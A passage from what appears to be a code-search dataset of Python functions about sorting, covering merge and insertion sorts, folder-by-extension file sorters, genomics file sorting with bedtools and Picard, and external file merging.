ro_lst.sort(key=keyfunc)\n eta_lst.sort(key=keyfunc)\n infil_lst.sort(key=keyfunc)\n\n print 'starting the taw sort'\n sort_start = time.time()\n ro_taw_sorted = taw_sort(ro_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n eta_taw_sorted = taw_sort(eta_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n infil_taw_sorted = taw_sort(infil_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n rzsm_taw_sorted = taw_sort(rzsm_lst, runs, taw_list)\n sort_elapsed = (time.time() - sort_start)\n print 'sort elapsed {}'.format(sort_elapsed)\n\n # outname = '{}.csv'.format()\n\n list_output(taw_list, ro_taw_sorted, output_root, outname='ro_taw_{}.csv')\n list_output(taw_list, eta_taw_sorted, output_root, outname='eta_taw_{}.csv')\n list_output(taw_list, infil_taw_sorted, output_root, outname='infil_taw_{}.csv')\n list_output(taw_list, rzsm_taw_sorted, output_root, outname='rzsm_taw_{}.csv')\n\n # todo - finish out this so you can extract the value by loading the array and multiplying through each seed by each taw.", "def custom_sort(arr):\n pass", "def tweet_sort(twitter_data, results, cmp):\r\n \r\n # Insertion sort\r\n for i in range(1, len(results)):\r\n current = results[i]\r\n position = i\r\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\r\n results[position] = results[position - 1]\r\n position = position - 1 \r\n results[position] = current", "def sort_dataset_by_age():\n\n data = read_csv(Path(f'{data_files_path}/subject_data'))\n limits = get_limits(ageGroups)\n sortedCount = 0\n\n # For every age bin\n for target_folder, limit in limits.items():\n # Get the indexes of all files to be copied to the target folder\n index_list = list(data[(data['Age'] >= limit[0]) & (data['Age'] <= limit[1])].index)\n subjectCount = 0\n # For every file to be copied\n for i in index_list:\n filename = data.iloc[i]['Filename']\n temp = sortedCount\n # Get the source and 
destination file paths\n for src, dest in zip(new_sensor_paths, sensor_dirs[target_folder]):\n # if the file exists in the source directory\n if os.path.exists(Path(f'{src}/{filename[:-4]}.csv')):\n # copy it to the destination directory\n copyfile(Path(f'{src}/{filename[:-4]}.csv'), Path(f'{dest}/{filename[:-4]}.csv'))\n if temp == sortedCount:\n sortedCount += 1\n subjectCount += 1\n # print(f'src = {src}\\ndest = {dest}\\n\\n')\n\n print(f'\\n# of Subjects in \"{target_folder}\" = {subjectCount}')\n\n print(f'\\nTotal subjects sorted = {sortedCount} ({round((sortedCount / len(data)) * 100, 2)}% of total data)\\n')", "def handle_coreutils_sort_kwargs(self, prog='sort', instream=None, **kwargs):\n pybedtools.logger.debug(\n 'BedTool.handle_coreutils_sort_kwargs() got these kwargs:\\n%s',\n pprint.pformat(kwargs))\n\n stdin = None\n\n # Decide how to send instream to sort.\n # If it's a BedTool, then get underlying stream\n if isinstance(instream, BedTool):\n instream = instream.fn\n\n # Filename? No pipe, just provide the file\n if isinstance(instream, six.string_types):\n stdin = None\n input_fn = instream\n # A generator or iterator: pipe it as a generator of lines\n else:\n stdin = (str(i) for i in instream)\n input_fn = '-'\n\n # If stream not specified, then a tempfile will be created\n if kwargs.pop('stream', None):\n tmp = None\n else:\n output = kwargs.pop('output', None)\n if output:\n tmp = output\n else:\n tmp = BedTool._tmp()\n\n additional_args = kwargs.pop('additional_args', None)\n\n # Parse the kwargs into BEDTools-ready args\n cmds = [prog]\n\n for key, value in sorted(list(kwargs.items()), reverse=True):\n if isinstance(value, bool):\n if value:\n cmds.append('--' + key)\n else:\n continue\n elif isinstance(value, list) or isinstance(value, tuple):\n value = list(map(str, value))\n\n # sort --key 1,1 --key 2,2r -k 5,5\n for val in value:\n if len(key) == 1:\n cmds.append('-' + key)\n else:\n cmds.append('--' + key)\n cmds.append(str(val))\n else:\n cmds.append('--' + key)\n cmds.append(str(value))\n\n if additional_args:\n cmds.append(additional_args)\n\n cmds.append(input_fn)\n return cmds, tmp, stdin", "def sort(arr, filename):\n if len(arr) > 1:\n mid = len(arr) // 2 # Finding the mid of the array\n L = arr[:mid] # Dividing the array elements\n R = arr[mid:] # into 2 halves\n sort(L, filename) # Sorting the first half\n sort(R, filename) # Sorting the second half\n\n i = j = k = 0\n\n # Copy data to temp arrays L[] and R[]\n while i < len(L) and j < len(R):\n if L[i] < R[j]:\n arr[k] = L[i]\n i += 1\n else:\n arr[k] = R[j]\n j += 1\n k += 1\n\n # Checking if any element was left\n while i < len(L):\n arr[k] = L[i]\n i += 1\n k += 1\n\n while j < len(R):\n arr[k] = R[j]\n j += 1\n k += 1\n with open(\"output/temp/\" + filename, \"w\") as file:\n for item in arr:\n file.write('%s\\n' % item)", "def main():\n # The following dictionary will allow us to map extensions to the destination folder names\n extension_to_category = {}\n os.chdir(\"FilesToSort\")\n for filename in os.listdir('.'):\n # Ignore directories, just process files\n if os.path.isdir(filename):\n continue\n\n extension = filename.split('.')[-1]\n if extension not in extension_to_category:\n category = input(\"What category would you like to sort {} files into? 
\".format(extension))\n # Now we can map this new extension to a folder name\n extension_to_category[extension] = category\n try:\n # We don't expect to get an exception due to the if statement\n # But we'll play it safe anyway in case the user chooses an existing folder\n os.mkdir(category)\n except FileExistsError:\n pass\n\n # We don't need a separate loop for this next step\n # We're already in a loop per file and we now know where to put it\n os.rename(filename, \"{}/{}\".format(extension_to_category[extension], filename))", "def test_for_different_input_sizes_asc(self):\n for size in range(1, 50):\n c = [random.randint(1, 1000) for _ in range(size)]\n\n copy = c\n\n # sort using mergeSort and using builtin sort\n sort.asc(c)\n copy.sort()\n\n assert c == copy", "def oldsortslice(self):\n ...", "def main():\n os.chdir(\"FilesToSort\")\n files = os.listdir('.')\n for file in files:\n extension_directory = file[file.find('.') + 1:]\n try:\n os.mkdir(extension_directory)\n except FileExistsError:\n pass\n shutil.move(file, extension_directory)", "def sort_bed_dir(input_beddir,output_beddir):\n print(\"processing .. sorting bed files \",input_beddir)\n if not os.path.exists(input_beddir):\n raise(\"input directory does not exist\")\n if not os.path.exists(output_beddir):\n os.makedirs(output_beddir)\n\n cmd = [\"bedtools\", \"sort\", \"-i\", \"${FILENAME}.bed\"]\n for file in glob.glob(os.path.join(input_beddir, '*bed')):\n file_name = os.path.basename(file).split('.')[0]\n output_filename = os.path.join(output_beddir, file_name+\"_sort.bed\")\n bedtool_obj = pybedtools.BedTool(file)\n bedtool_obj.sort().saveas(output_filename)\n # cmd[-1] = file\n # with open(output_filename, \"w\") as file:\n # subprocess.run(cmd, check=True, stdout=file)", "def tweet_sort(twitter_data, results, cmp):\n\n # Insertion sort\n for i in range(1, len(results)):\n current = results[i]\n position = i\n while position > 0 and cmp(twitter_data, results[position - 1], current) > 0:\n results[position] = results[position - 1]\n position = position - 1\n results[position] = current", "def sort_files(read_path, search_str, recursive=False):\n\n #glob all raw files and sort\n #if recursive:\n # all_files = sorted(glob.glob('{}/**/{}'.format(read_path, search_str),\n # recursive=recursive))\n #else:\n # all_files = sorted(glob.glob('{}/{}'.format(read_path, search_str)))\n\n\n # dealing with google cloud bucket?\n google_cloud = (read_path[0:5] == 'gs://')\n\n if not google_cloud or types is None or 'object' in types:\n all_files = sorted(list_files(read_path, search_str, recursive=recursive))\n else:\n # reading a bucket fits file header is rather slow in the\n # Google cloud, so if only biases, darks, flats or object\n # images are needed through input parameter imgtypes (= global\n # parameter types), then only select those files\n tmp_files = []\n if 'bias' in types:\n tmp_files.append(list_files(read_path, 'Bias', recursive=recursive))\n if 'flat' in types:\n tmp_files.append(list_files(read_path, 'flat', recursive=recursive))\n if 'dark' in types:\n tmp_files.append(list_files(read_path, 'Dark', recursive=recursive))\n\n # for object files, all files are selected (first part of this\n # if statement), mainly because the raw image name does not\n # indicate the image type for object files\n\n # clean up lists within list\n all_files = sorted([f for sublist in tmp_files for f in sublist])\n\n\n biases = [] #list of biases\n darks = [] #list of darks\n flats = [] #list of flats\n objects = [] # list of science 
images\n others = [] # list of other images\n\n for i, filename in enumerate(all_files): #loop through raw files\n\n header = read_hdulist(filename, get_data=False, get_header=True)\n\n if 'IMAGETYP' not in header:\n log.info ('keyword IMAGETYP not present in header of image; '\n 'not processing {}'.format(filename))\n # add this file to [others] list, which will not be reduced\n others.append(filename)\n\n else:\n\n imgtype = header['IMAGETYP'].lower() #get image type\n\n if 'bias' in imgtype: #add bias files to bias list\n biases.append(filename)\n elif 'dark' in imgtype: #add dark files to dark list\n darks.append(filename)\n elif 'flat' in imgtype: #add flat files to flat list\n flats.append(filename)\n elif 'object' in imgtype: #add science files to science list\n objects.append(filename)\n else:\n # none of the above, add to others list\n others.append(filename)\n\n return biases, darks, flats, objects, others", "def apply_sorting(tasks, *conditions):\n return tasks.sort(conditions)", "def start_sorting(sorting_algos):\n for algo in sorting_algos:\n algo.run()", "def insertion_sort_file(filelist):\n i=0\n j=0\n while i < len(filelist)-1:\n j = i+1\n min = filelist[i]\n ind = i\n while j < len(filelist):\n if min.name > filelist[j].name:\n min = filelist[j]\n ind = j\n j += 1\n (filelist[i], filelist[ind]) = (filelist[ind], filelist[i])\n i += 1", "def process_file_sorting(\n cls,\n file: str,\n remove_duplicates: bool = True,\n write_header: bool = True,\n sorting_key: Any = None,\n ) -> None:\n\n # pylint: disable=too-many-locals,too-many-statements\n\n def merge_files(\n files: List[TextIOWrapper],\n ) -> Generator[Tuple[List[TextIOWrapper]], str, None]:\n \"\"\"\n Merges the given files and yield each \"lines\" of the merged file.\n\n :param files:\n The files to merge.\n \"\"\"\n\n result = []\n\n for index, file in enumerate(files):\n try:\n iterator = iter(file)\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n previous = None\n comment_count = 0\n max_comment_count = 2\n\n while result:\n ignore = False\n\n _, index, value, iterator, file = heapq.heappop(result)\n\n if remove_duplicates and value == previous:\n ignore = True\n\n if (\n write_header\n and comment_count < max_comment_count\n and value[0] == \"#\"\n ):\n ignore = True\n max_comment_count += 1\n\n if not ignore:\n yield value\n previous = value\n\n try:\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n temp_directory = tempfile.TemporaryDirectory()\n temporary_output_file = os.path.join(temp_directory.name, secrets.token_hex(6))\n\n if not sorting_key:\n sorting_key = get_best_sorting_key()\n\n file_helper = FileHelper(file)\n\n sorted_files = []\n\n PyFunceble.facility.Logger.info(\"Started sort of %r.\", file)\n\n with file_helper.open(\n \"r\", encoding=\"utf-8\", buffering=cls.FILE_BUFFER_SIZE\n ) as file_stream:\n while True:\n to_sort = list(islice(file_stream, cls.MAX_LINES))\n\n if not to_sort:\n break\n\n new_file = open(\n os.path.join(temp_directory.name, secrets.token_hex(6)),\n \"w+\",\n encoding=\"utf-8\",\n buffering=cls.FILE_BUFFER_SIZE,\n )\n new_file.writelines(\n ListHelper(to_sort)\n .remove_duplicates()\n .custom_sort(key_method=sorting_key)\n .subject\n )\n new_file.flush()\n new_file.seek(0)\n sorted_files.append(new_file)\n\n with open(\n temporary_output_file, \"w\", 
cls.FILE_BUFFER_SIZE, encoding=\"utf-8\"\n ) as file_stream:\n if write_header:\n file_stream.write(FilePrinter.STD_FILE_GENERATION)\n file_stream.write(FilePrinter.get_generation_date_line())\n file_stream.write(\"\\n\\n\")\n\n file_stream.writelines(merge_files(sorted_files))\n\n FileHelper(temporary_output_file).move(file)\n\n PyFunceble.facility.Logger.info(\"Finished sort of %r.\", file)\n\n temp_directory.cleanup()", "def test_sorting(sort=selection_sort, num_items=20, max_value=50):\n # TODO: Repeat until all items are in sorted order\n # TODO: Take first unsorted item\n # TODO: Insert it in sorted order in front of items", "def __get_sorted_file_list(self):\n d = self.__view.CurrentImgDir\n list = os.listdir(d)\n if self.__view.SortType == constant.THUMB_SORT_FILENAME:\n # Sort by Name\n list.sort()\n if self.__view.SortType == 2:\n # Sort by Size\n list.sort(lambda a, b: int(os.stat(os.path.join(d,a))[stat.ST_SIZE] - os.stat(os.path.join(d,b))[stat.ST_SIZE])) \n return list", "def _sift(self, fileslist, **arguments):\n\n def sort(reverse, arg, fileslist=fileslist):\n tdict = {fileslist[i][arg] : i for i in xrange(len(fileslist))}\n keys = tdict.keys()\n keys.sort(reverse=reverse)\n indexs = [tdict[i] for i in keys]\n fileslist = [fileslist[i] for i in indexs]\n return fileslist\n\n # for time\n if arguments.get('name'):\n reverse = None\n if arguments['name'] == 'reverse':\n reverse = True\n elif arguments['name'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'server_filename')\n\n # for size\n if arguments.get('size'):\n reverse = None\n if arguments['size'] == 'reverse':\n reverse = True\n elif arguments['size'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'size')\n\n # for size\n if arguments.get('time'):\n reverse = None\n if arguments['time'] == 'reverse':\n reverse = True\n elif arguments['time'] == 'no_reverse':\n reverse = False\n fileslist = sort(reverse, 'local_mtime')\n\n # for head, tail, include, exclude\n head = args.head\n tail = args.tail\n include = args.include\n exclude = args.exclude\n if head or tail or include or exclude:\n tdict = {fileslist[i]['server_filename'] : i for i in xrange(len(fileslist))}\n keys1 = [i for i in tdict.keys() if i.lower().startswith(head.encode('utf8').lower())] \\\n if head else []\n keys2 = [i for i in tdict.keys() if i.lower().endswith(tail.decode('utf8').lower())] \\\n if tail else []\n keys3 = [i for i in tdict.keys() if re.search(include, i.encode('utf8'), flags=re.I)] \\\n if include else []\n keys4 = [i for i in tdict.keys() if not re.search(exclude, i.encode('utf8'), flags=re.I)] \\\n if exclude else []\n\n # intersection\n keys = [i for i in [keys1, keys2, keys3, keys4] if i]\n if len(keys) > 1:\n tkeys = keys[0]\n for i in keys:\n tkeys &= i\n keys = tkeys\n elif len(keys) == 1:\n keys = keys[0]\n elif len(keys) == 0:\n keys = []\n\n indexs = [tdict[i] for i in keys]\n fileslist = [fileslist[i] for i in indexs]\n\n dirs = [i for i in fileslist if i['isdir']]\n files = [i for i in fileslist if not i['isdir']]\n if arguments.get('desc') == 1:\n dirs.reverse()\n files.reverse()\n fileslist = dirs + files\n\n return fileslist", "def main():\n\n tests = [500, 1000, 10000]\n results = {\n 'Insertion Sort': 0.0,\n 'Shell Sort': 0.0,\n 'Python Sort': 0.0\n }\n\n for test in tests:\n i = 0\n\n while i < 100:\n test_list = gen_random_list(test)\n results['Insertion Sort'] += insertion_sort(test_list)[0]\n results['Shell Sort'] += shell_sort(test_list)[0]\n results['Python Sort'] += 
python_sort(test_list)[0]\n i += 1\n\n print(\"Sort results for list of size %s items:\" % test)\n for key, value in results.items():\n print(\"%s took %10.7f seconds to run, on average.\" % (key, (value/100)))\n print(\"\\n\")", "def use_mergesort(inputfile, outputfile):\n f = open(inputfile, 'r')\n text = f.read()\n f.close\n numList = text.split()\n for i in range(len(numList)):\n numList[i] = int(numList[i])\n sorted_list = merge_sort(numList)\n output = ''\n for i in range(len(numList)):\n output += str(sorted_list[i]) + '\\n'\n g = open(outputfile, 'w')\n g.write(output)\n g.close()\n return", "def samples_sorted():\n\n import glob\n cars_original = glob.glob(\"./vehicles/*/*.png\")\n # The following are duplicated:\n cars_KITTI = glob.glob(\"./vehicles/KITTI_extracted/*.png\")\n cars_GTI_Right = glob.glob(\"./vehicles/GTI_Right/*.png\")\n cars_GTI_Left = glob.glob(\"./vehicles/GTI_Left/*.png\")\n cars = cars_original + cars_KITTI + cars_GTI_Left + cars_GTI_Right\n # The above introduces duplication of samples, causing bleeding of training samples into validation\n np.random.shuffle(cars) # side effect return None\n cars_to_be_augmented = cars_GTI_Left + cars_GTI_Right\n np.random.shuffle(cars_to_be_augmented)\n num_cars = len(cars) + len(cars_to_be_augmented)\n\n non_cars_original = glob.glob(\"./non-vehicles/*/*.png\")\n # The following are duplicated:\n non_cars_Extras = glob.glob(\"./non-vehicles/Extras/*.png\")\n noncars = non_cars_original + non_cars_Extras + non_cars_Extras\n # The above introduces duplication of samples, causing bleeding of training samples into validation\n np.random.shuffle(noncars) # side effect return None\n num_noncars = len(noncars)\n return cars, noncars, cars_to_be_augmented, num_cars, num_noncars", "def sort_bam(self) -> None:\n self.analysis.logger.info(\"Sorting BAM(s)\")\n self.chdir()\n config = self.analysis.config\n\n os.makedirs(self.sort_tempdir, exist_ok=True)\n\n executor = Executor(self.analysis)\n executor(\n f\"{config.java} {config.picard_jvm_args} -jar {config.picard} \"\n f\"SortSam \"\n f\"I={{input_filename}} \"\n f\"O={{output_filename}} SO=coordinate \"\n f\"TMP_DIR={self.sort_tempdir}\"\n f\"{self.max_records_str}\",\n output_format=f\"{self.analysis.basename}.srt{{organism_str}}.bam\",\n error_string=\"Picard SortSam exited with status {status}\",\n exception_string=\"picard SortSam error\",\n only_human=self.only_human,\n split_by_organism=True,\n unlink_inputs=True,\n )\n\n executor(\n f\"{config.java} {config.picard_jvm_args} -jar {config.picard} \"\n f\"ReorderSam \"\n f\"I={{input_filename}} \"\n f\"O={{output_filename}} R={{genome_ref}} \"\n f\"CREATE_INDEX=true\"\n f\"{self.max_records_str}\",\n output_format=f\"{self.analysis.basename}\"\n f\".srt.reorder{{organism_str}}.bam\",\n error_string=\"Picard ReorderSam exited with status {status}\",\n exception_string=\"picard ReorderSam error\",\n only_human=self.only_human,\n split_by_organism=True,\n unlink_inputs=True,\n )\n\n if os.path.exists(self.sort_tempdir):\n shutil.rmtree(self.sort_tempdir)\n self.analysis.logger.info(\"Finished sorting\")", "def test_three_split():\n run_mergesort([3, 0, 3], [0, 3, 3])", "def keysort(*args, **kwargs): # real signature unknown\n pass", "def isort(context):\n exec_cmd = \"isort . 
--check --diff\"\n run_cmd(context, exec_cmd)", "def mergeSortedToFile(arr):\n # list the elements of sorted text file\n # print(arr)\n sortedFileList = []\n with open(OUTPUT_SORTED_FILE) as file:\n for line in file:\n line = int(line.strip())\n sortedFileList.append(line)\n l1 = len(arr)\n l2 = len(sortedFileList)\n l3 = l1 + l2\n m = 0\n i = 0\n j = 0\n out2 = [0] * l3\n while (i < l1 and j < l2):\n if (arr[i] < sortedFileList[j]):\n out2[m] = arr[i]\n m += 1\n i += 1\n else:\n out2[m] = sortedFileList[j]\n m += 1\n j += 1\n while (i < l1):\n out2[m] = arr[i]\n m += 1\n i += 1\n while (j < l2):\n out2[m] = sortedFileList[j]\n m += 1\n j += 1\n # writing merged sorted output list to tht output file\n with open(OUTPUT_SORTED_FILE, \"w\") as file:\n for item in out2:\n file.write('%s\\n' % item)", "def sort_bam(inbamfile,\n outbamfile,\n sort_order=\"coordinate\"):\n\n cmd_sort = \"java -Xmx6g -jar $NGS_PICARD/SortSam.jar \" \\\n \"INPUT=%s \" \\\n \"OUTPUT=%s \" \\\n \"SORT_ORDER=%s\" % (inbamfile,\n outbamfile,\n sort_order)\n return cmd_sort", "def sort_batch_tsvs(self,batch,batch_dir):\n tsvs = []\n for file in os.listdir(batch_dir):\n if file.endswith(\".tsv\"):\n tsvs.append(os.path.join(batch_dir, file))\n\n nodes = self.get_submission_order()\n nodes = [i[0] for i in nodes]\n\n node_tsvs = {}\n clinical_manifests,image_manifests = [],[]\n other_tsvs,nomatch_tsvs = [],[]\n node_regex = r\".*/(\\w+)_{}\\.tsv\".format(batch)\n\n for tsv in tsvs:\n print(tsv)\n if 'manifest' in tsv:\n if 'clinical' in tsv:\n clinical_manifests.append(tsv)\n elif 'image' in tsv or 'imaging' in tsv:\n image_manifests.append(tsv)\n else:\n match = re.findall(node_regex, tsv, re.M)\n print(match)\n\n if not match:\n nomatch_tsvs.append(tsv)\n else:\n node = match[0]\n if node in nodes:\n #node_tsvs.append({node:tsv})\n node_tsvs[node] = tsv\n elif node + \"_file\" in nodes:\n #node_tsvs.append({\"{}_file\".format(node):tsv})\n node_tsvs[\"{}_file\".format(node)] = tsv\n else:\n other_tsvs.append({node:tsv})\n batch_tsvs = {\"batch\":batch,\n \"node_tsvs\":node_tsvs,\n \"image_manifests\":image_manifests,\n \"clinical_manifests\":clinical_manifests,\n \"other_tsvs\":other_tsvs,\n \"nomatch_tsvs\":nomatch_tsvs}\n return batch_tsvs", "def sort_files_by_name(names: List[str], reverse: bool = False):\n num_sort_index: int\n num_count: int\n\n def get_image_index(name: str):\n \"\"\"\n Get the index of name.\n filename: 'MR Neck PS.eT2W_SPAIR SENSE.Se 602.Img 10-32.jpg'\n the index is 10\n :param name:\n :return:\n \"\"\"\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])\n\n if len(names) > 2:\n num1 = pattern.findall(os.path.basename(names[0]))\n num2 = pattern.findall(os.path.basename(names[1]))\n # 解析出来的数字数目应该一样多\n num_count = len(num1)\n assert num_count == len(num2)\n arr1 = np.array(num1)\n arr2 = np.array(num2)\n diff: np.ndarray = arr1 == arr2\n\n # 按道理最多只能有一个数字不一样\n # 40806068_20200827_MR_6_2_2.jpg\n # 40806068_20200827_MR_6_3_3.jpg\n # assert diff.sum() + 1 == num_count\n\n # numpy数组中: True = 1, False = 0\n num_sort_index = diff.argmin()\n # TODO remove this line\n # print(num1, num2, num_sort_index)\n\n names.sort(key=get_image_index, reverse=reverse)\n return names", "def volume_sort(self):\n self.jobs_sorted = sorted(\n self.jobs,\n key=lambda job: (job['height'], job['width'] * job['height']),\n # key=lambda job: job['width'] * 
job['height'],\n reverse=True)", "def add_sort_filter(source, args, index):\n tags = hxl.TagPattern.parse_list(args.get('sort-tags%02d' % index, ''))\n reverse = (args.get('sort-reverse%02d' % index) == 'on')\n return source.sort(tags, reverse)", "def sortbatch(q_batch, a_batch, q_lens, a_lens):\n maxlen_q = max(q_lens)\n maxlen_a = max(a_lens)\n q=q_batch[:,:maxlen_q-1]\n a=a_batch[:,:maxlen_a-1]\n sorted_idx = torch.LongTensor(a_lens.numpy().argsort()[::-1].copy())\n return q[sorted_idx], a[sorted_idx], q_lens[sorted_idx], a_lens[sorted_idx]", "def sort(args):\n p = OptionParser(sort.__doc__)\n p.add_option(\n \"--sizes\", default=False, action=\"store_true\", help=\"Sort by decreasing size\"\n )\n\n opts, args = p.parse_args(args)\n\n if len(args) != 1:\n sys.exit(p.print_help())\n\n (fastafile,) = args\n sortedfastafile = fastafile.rsplit(\".\", 1)[0] + \".sorted.fasta\"\n\n f = Fasta(fastafile, index=False)\n fw = must_open(sortedfastafile, \"w\")\n if opts.sizes:\n # Sort by decreasing size\n sortlist = sorted(f.itersizes(), key=lambda x: (-x[1], x[0]))\n logging.debug(\n \"Sort by size: max: {0}, min: {1}\".format(sortlist[0], sortlist[-1])\n )\n sortlist = [x for x, s in sortlist]\n else:\n sortlist = sorted(f.iterkeys())\n\n for key in sortlist:\n rec = f[key]\n SeqIO.write([rec], fw, \"fasta\")\n\n logging.debug(\"Sorted file written to `{0}`.\".format(sortedfastafile))\n fw.close()\n\n return sortedfastafile", "def run_mergesort(original, expected):\n mergesort(original)\n assert original == expected", "def sortby(self):\n ...", "def sort_collected_data():\n\n def is_from_valid_set(fn):\n return fn.find(\"validation\") != -1\n\n source_dir = \"data\"\n\n x_train_dir = os.path.join(SEG_DATA_FOLDER, \"train\")\n y_train_dir = os.path.join(SEG_DATA_FOLDER, \"train_label\")\n x_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val\")\n y_valid_dir = os.path.join(SEG_DATA_FOLDER, \"val_label\")\n\n for direc in [x_train_dir, y_train_dir, x_valid_dir, y_valid_dir]:\n mkdir_if_not_exist(direc)\n\n images = [x for x in os.listdir(source_dir) if x.find(\"png\") >= 0]\n inputs = [x for x in images if x.find(\"label\") == -1]\n labels = [x for x in images if x.find(\"label\") != -1]\n\n train_x = [x for x in inputs if not is_from_valid_set(x)]\n valid_x = [x for x in inputs if is_from_valid_set(x)]\n train_y = [x for x in labels if not is_from_valid_set(x)]\n valid_y = [x for x in labels if is_from_valid_set(x)]\n\n for f in train_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_train_dir, f))\n\n for f in train_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_train_dir, f))\n\n for f in valid_x:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(x_valid_dir, f))\n\n for f in valid_y:\n shutil.copyfile(os.path.join(\"data\", f), os.path.join(y_valid_dir, f))", "def merge_sort(alist):\n print(\"Splitting \", alist)\n # Temporary list to store sorted list\n work = [None] * len(alist)\n rec_merge_sort(work, start=0, end=len(alist)-1)", "def merge_files(\n files: List[TextIOWrapper],\n ) -> Generator[Tuple[List[TextIOWrapper]], str, None]:\n\n result = []\n\n for index, file in enumerate(files):\n try:\n iterator = iter(file)\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()\n\n previous = None\n comment_count = 0\n max_comment_count = 2\n\n while result:\n ignore = False\n\n _, index, value, iterator, file = heapq.heappop(result)\n\n if remove_duplicates and value 
== previous:\n ignore = True\n\n if (\n write_header\n and comment_count < max_comment_count\n and value[0] == \"#\"\n ):\n ignore = True\n max_comment_count += 1\n\n if not ignore:\n yield value\n previous = value\n\n try:\n value = next(iterator)\n\n heapq.heappush(\n result, ((sorting_key(value), index, value, iterator, file))\n )\n except StopIteration:\n file.close()", "def sort_variants(infile, mode='chromosome'):\n command = [\n 'sort',\n ]\n if mode == 'chromosome':\n command.append('-n')\n command.append('-k1')\n command.append('-k3')\n\n elif mode == 'rank':\n command.append('-rn')\n command.append('-k1')\n\n command = command + [infile, '-o', infile]\n\n logger.info(\"Start sorting variants...\")\n logger.info(\"Sort command: {0}\".format(' '.join(command)))\n sort_start = datetime.now()\n \n try:\n call(command)\n except OSError as e:\n logger.warning(\"unix program 'sort' does not seem to exist on your system...\")\n logger.warning(\"genmod needs unix sort to provide a sorted output.\")\n logger.warning(\"Output VCF will not be sorted since genmod can not find\"\\\n \"unix sort\")\n raise e\n\n logger.info(\"Sorting done. Time to sort: {0}\".format(datetime.now()-sort_start))\n \n return", "def shell_sort(a_list):\n \n start_time = time.time()\n\n sublist_count = len(a_list) // 2\n while sublist_count > 0:\n for start_position in range(sublist_count):\n gap_insertion_sort(a_list, start_position, sublist_count)\n\n sublist_count = sublist_count // 2\n\n end_time = time.time()\n\n run_time = end_time - start_time\n\n return (run_time, a_list)", "def csvs_scattered_to_grouped(path_dir, inlist, outlist, gcols,\n sort=1, scols=None, catalog=\"\", supersede=False):\n\n filelist=[os.path.join(path_dir,i) for i in inlist]\n n_split=len(outlist)\n\n pdfs=pd.read_csv(filelist[0],usecols=gcols)\n pdfs.drop_duplicates(inplace=True)\n\n print(\"csvs_scattered_to_grouped: Collecting items for group.\\n\")\n for i in range(1,len(filelist)):\n pdfs=pdfs.append(pd.read_csv(filelist[i],usecols=gcols),ignore_index=True)\n pdfs.drop_duplicates(inplace=True)\n\n if sort==1:\n pdfs.sort_values(gcols,inplace=True, ascending=True)\n elif sort==-1:\n pdfs.sort_values(gcols,inplace=True, ascending=False)\n\n aa_ed=np.array_split(pdfs, n_split)\n\n if supersede:\n for i in outlist:\n if os.path.isfile(os.path.join(path_dir,i)):\n os.remove(os.path.join(path_dir,i))\n if os.path.isfile(os.path.join(path_dir,str(catalog))):\n os.remove(os.path.join(path_dir,str(catalog)))\n\n print(\"csvs_scattered_to_grouped: Start processing files:\\n\")\n for i in range(0,len(filelist)):\n fi=pd.read_csv(filelist[i],usecols=scols)\n for j,ja in enumerate(aa_ed):\n wrtj=pd.merge(ja, fi, how='inner', on=gcols)\n append_to_csv(wrtj, os.path.join(path_dir,outlist[j]))\n print('csvs_scattered_to_grouped: '+str(i)+' file(s) finished.')\n\n if catalog:\n for i, d in enumerate(aa_ed):\n d['_@_FILE_']=outlist[i]\n append_to_csv(d, os.path.join(path_dir,str(catalog)))\n print('csvs_scattered_to_grouped: Catalog file created.')", "def sort_and_save_test(data, type_data, id_data, N_max, n_per_conn, path):\n\n sizes = (N_max*n_per_conn - np.isnan(data).sum(axis=1)) // n_per_conn\n\n # get sorted indices\n sorted_indices = np.argsort(sizes)\n\n # sort\n data = data[sorted_indices]\n sizes = sizes[sorted_indices]\n type_data = type_data[sorted_indices]\n id_data = id_data[sorted_indices]\n\n # counter variable\n i = 0\n\n data_ = []\n type_ = []\n id_ = []\n\n # loop over sizes\n for size in range(1, N_max+1):\n data_list = []\n 
type_list = []\n id_list = []\n\n while i < len(data) and size == sizes[i]:\n data_list.append(data[i, 0:(size*n_per_conn)])\n type_list.append(type_data[i, 0:size].astype(int))\n id_list.append(id_data[i, 0:size].astype(int))\n i += 1\n\n if len(data_list) > 1:\n data_.append(torch.tensor(np.vstack(data_list),\n dtype=torch.float32))\n type_.append(torch.from_numpy(np.vstack(type_list)))\n id_.append(torch.from_numpy(np.vstack(id_list)))\n elif len(data_list) == 1:\n data_.append(torch.from_numpy(data_list[0], dtype=torch.float32))\n type_.append(torch.from_numpy(type_list[0]))\n id_.append(torch.from_numpy(id_list[0]))\n else:\n continue\n\n torch.save(data_, os.path.join(path, 'test.pt'))\n torch.save(type_, os.path.join(path, 'test_type.pt'))\n torch.save(id_, os.path.join(path, 'id.pt'))", "def sort_inventory(self, inventory_list): # dont use transactions here...as it is called within other transactions\n # unused will be deprecated\n batch_list = []\n new_inventory_list = []\n try:\n for i in inventory_list:\n if i.batch_number:\n batch_list.append(i.batch_number)\n batch_list.sort()\n for i in batch_list:\n for j in inventory_list:\n if j.batch_number == i:\n new_inventory_list.append(j)\n return new_inventory_list\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return new_inventory_list", "def sort_files(filenames, ref_hashes):\n filenames = [f for f in filenames if 'glog.xml' in f]\n hashes = 